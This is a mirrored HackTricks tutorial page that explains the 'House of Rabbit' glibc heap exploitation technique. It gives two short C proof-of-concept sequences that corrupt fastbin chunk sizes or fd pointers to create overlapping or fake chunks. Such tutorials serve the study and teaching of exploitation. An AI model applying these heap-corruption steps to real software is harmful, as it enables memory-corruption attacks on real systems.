mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-03 00:38:52 +00:00
138 lines
5.9 KiB
Markdown
138 lines
5.9 KiB
Markdown
|
# House of Rabbit
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
### Requirements
|
||
|
|
||
|
1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
|
||
|
2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
|
||
|
|
||
|
### Goals
|
||
|
|
||
|
1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
|
||
|
2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
|
||
|
|
||
|
## Steps of the attack
|
||
|
|
||
|
### POC 1: Modify the size of a fast bin chunk
|
||
|
|
||
|
**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk.
|
||
|
|
||
|
* **Step 1: Allocate Chunks**
|
||
|
|
||
|
```cpp
|
||
|
unsigned long* chunk1 = malloc(0x40); // Allocates a chunk of 0x40 bytes at 0x602000
|
||
|
unsigned long* chunk2 = malloc(0x40); // Allocates another chunk of 0x40 bytes at 0x602050
|
||
|
malloc(0x10); // Allocates a small chunk to change the fastbin state
|
||
|
```
|
||
|
|
||
|
We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.
|
||
|
|
||
|
* **Step 2: Free Chunks**
|
||
|
|
||
|
```cpp
|
||
|
free(chunk1); // Frees the chunk at 0x602000
|
||
|
free(chunk2); // Frees the chunk at 0x602050
|
||
|
```
|
||
|
|
||
|
We free both chunks, adding them to the fastbin list.
|
||
|
|
||
|
* **Step 3: Modify Chunk Size**
|
||
|
|
||
|
```cpp
|
||
|
chunk1[-1] = 0xa1; // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])
|
||
|
```
|
||
|
|
||
|
We change the size metadata of `chunk1` to 0xa1. This is a crucial step to trick the allocator during consolidation.
|
||
|
|
||
|
* **Step 4: Trigger `malloc_consolidate`**
|
||
|
|
||
|
```cpp
|
||
|
malloc(0x1000); // Allocate a large chunk to trigger heap consolidation
|
||
|
```
|
||
|
|
||
|
Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fast bin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
|
||
|
|
||
|
After consolidation, `chunk1` overlaps with `chunk2`, allowing for further exploitation.
|
||
|
|
||
|
### POC 2: Modify the `fd` pointer
|
||
|
|
||
|
**Objective**: Create a fake chunk by manipulating the fast bin `fd` pointer.
|
||
|
|
||
|
* **Step 1: Allocate Chunks**
|
||
|
|
||
|
```cpp
|
||
|
unsigned long* chunk1 = malloc(0x40); // Allocates a chunk of 0x40 bytes at 0x602000
|
||
|
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050
|
||
|
```
|
||
|
|
||
|
**Explanation**: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk.
|
||
|
|
||
|
* **Step 2: Create fake chunk**
|
||
|
|
||
|
```cpp
|
||
|
chunk2[1] = 0x31; // Fake chunk size 0x30
|
||
|
chunk2[7] = 0x21; // Next fake chunk
|
||
|
chunk2[11] = 0x21; // Next-next fake chunk
|
||
|
```
|
||
|
|
||
|
We write fake chunk metadata into `chunk2` to simulate smaller chunks.
|
||
|
|
||
|
* **Step 3: Free `chunk1`**
|
||
|
|
||
|
```cpp
|
||
|
free(chunk1); // Frees the chunk at 0x602000
|
||
|
```
|
||
|
|
||
|
**Explanation**: We free `chunk1`, adding it to the fastbin list.
|
||
|
|
||
|
* **Step 4: Modify `fd` of `chunk1`**
|
||
|
|
||
|
```cpp
|
||
|
chunk1[0] = 0x602060; // Modify the fd of chunk1 to point to the fake chunk within chunk2
|
||
|
```
|
||
|
|
||
|
**Explanation**: We change the forward pointer (`fd`) of `chunk1` to point to our fake chunk inside `chunk2`.
|
||
|
|
||
|
* **Step 5: Trigger `malloc_consolidate`**
|
||
|
|
||
|
```cpp
|
||
|
malloc(5000); // Allocate a large chunk to trigger heap consolidation
|
||
|
```
|
||
|
|
||
|
Allocating a large chunk again triggers `malloc_consolidate`, which processes the fake chunk.
|
||
|
|
||
|
The fake chunk becomes part of the fastbin list, making it a legitimate chunk for further exploitation.
|
||
|
|
||
|
### Summary
|
||
|
|
||
|
The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|